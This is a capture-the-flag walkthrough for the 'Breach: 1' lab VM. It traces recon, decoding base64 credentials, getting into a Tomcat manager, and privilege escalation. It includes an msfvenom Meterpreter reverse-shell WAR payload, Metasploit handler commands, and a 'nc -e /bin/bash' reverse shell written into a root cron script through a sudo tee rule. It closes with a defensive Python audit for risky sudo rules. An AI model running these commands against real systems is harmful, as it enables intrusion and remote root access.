Breach: 1

Reference

Writeup

  • Recon: the nmap scan shows every port as open, which suggests an IDS/IPS is in place
  • Browse directly to http://192.168.110.140
    • Viewing the page source reveals the string Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo
    • Base64-decoding it twice yields pgibbons:damnitfeel$goodtobeagang$ta, which looks like a username and password
  • Click the homepage image → Employee portal → log in and check the Inbox
    • 192.168.110.140/.keystore turns up; it is a Java KeyStore file, and the mail mentions the keyword ssl
    • Searching for ssl finds the article "SSL implementation test capture", which contains http://192.168.110.140/impresscms/_SSL_test_phase1.pcap
  • Open the capture in Wireshark: there is TLS traffic on TCP port 8443
  • The capture also contains the referer https://192.168.110.140:8443/_M@nag3Me/html
    • After logging in you land in the Tomcat Web Application Manager
    • It allows WAR file uploads, so generate a payload with msfvenom: msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.110.141 LPORT=4444 -f war -o manager.war (note: the Kali VM must also be on the host-only network as 192.168.110.141)
      use exploit/multi/handler
      set payload java/meterpreter/reverse_tcp
      set lhost 192.168.110.141
      set lport 4444
      run
      
    • Spawn a tty:
      echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
      python /tmp/asdf.py
      
  • Download http://192.168.110.140/images/bill.png
    • Running exiftool bill.png reveals Comment : coffeestains, which is a password
  • /etc/passwd contains the user blumbergh:x:1001:1001:Bill Lumbergh,,,:/home/blumbergh:/bin/bash
    • Log in with su blumbergh
    • Check which commands the account may run: sudo -l
      Matching Defaults entries for blumbergh on Breach:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
      User blumbergh may run the following commands on Breach:
        (root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh
      
    • So blumbergh can run /usr/bin/tee /usr/share/cleanup/tidyup.sh as root without a password, and tidyup.sh is executed on a schedule every three minutes
    • tidyup.sh itself is not writable by us (-rwxr-xr-x 1 root root 37 Oct 26 01:14 tidyup.sh), so we need another way to put data into it; the tee command granted by sudo can do exactly that:
      • First create shell.txt: echo "nc -e /bin/bash 192.168.110.141 7788" > shell.txt
      • Write the contents of shell.txt into tidyup.sh: cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
  • Listen on the attacking host with nc -vnlp 7788; when the three minutes are up, tidyup.sh runs automatically, a root shell comes back, and the flag can be read
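As an added defensive check, not part of the original writeup: a small Python audit that parses `sudo -l` output of the kind shown above and flags root rules for file-writing utilities such as tee, the misconfiguration this step relies on. The sample output is constructed from the listing above with one extra, benign rule added so the audit has something to leave alone.

```python
import os
import re

# Binaries whose job is to write caller-chosen content to a file; a root sudo rule
# for one of them delegates "write as root". A fixed script path as the target
# (something root runs from cron, as tidyup.sh is here) makes it a full escalation.
FILE_WRITERS = {"tee", "cp", "mv", "dd", "install"}
SCRIPT_SUFFIXES = (".sh", ".bash", ".py", ".pl")

# Constructed sample modelled on the `sudo -l` output in the writeup, plus one
# benign rule (apt-get update) that the audit should not flag.
SAMPLE_SUDO_L = """\
Matching Defaults entries for blumbergh on Breach:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin
User blumbergh may run the following commands on Breach:
    (root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh
    (root) /usr/bin/apt-get update
"""

# "(root) NOPASSWD: /usr/bin/tee /path" -> run-as spec, tag list, command line
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

def parse_sudo_l(output):
    """Return the per-user command rules from `sudo -l` output as dicts."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True  # every line after this header is a rule
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        argv = m.group("cmd").split()
        rules.append({"runas": m.group("runas").split(":")[0].strip(),
                      "nopasswd": "NOPASSWD" in m.group("tags"),
                      "binary": argv[0], "args": argv[1:]})
    return rules

def audit(rules):
    """Flag rules that let a user overwrite a file (worse: a script) as root."""
    findings = []
    for r in rules:
        if r["runas"] not in ("root", "ALL") or os.path.basename(r["binary"]) not in FILE_WRITERS:
            continue
        target = r["args"][-1] if r["args"] else "<any file>"  # no fixed arg = any path
        severity = ("HIGH" if target.endswith(SCRIPT_SUFFIXES) else "MEDIUM") + \
                   (" (NOPASSWD)" if r["nopasswd"] else "")
        findings.append(f"{severity}: {r['binary']} may overwrite {target} as {r['runas']}")
    return findings
```

The fix on the host side is to drop the tee rule entirely: a script that root runs from cron should be owned and edited by root only, never through a delegated write path.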
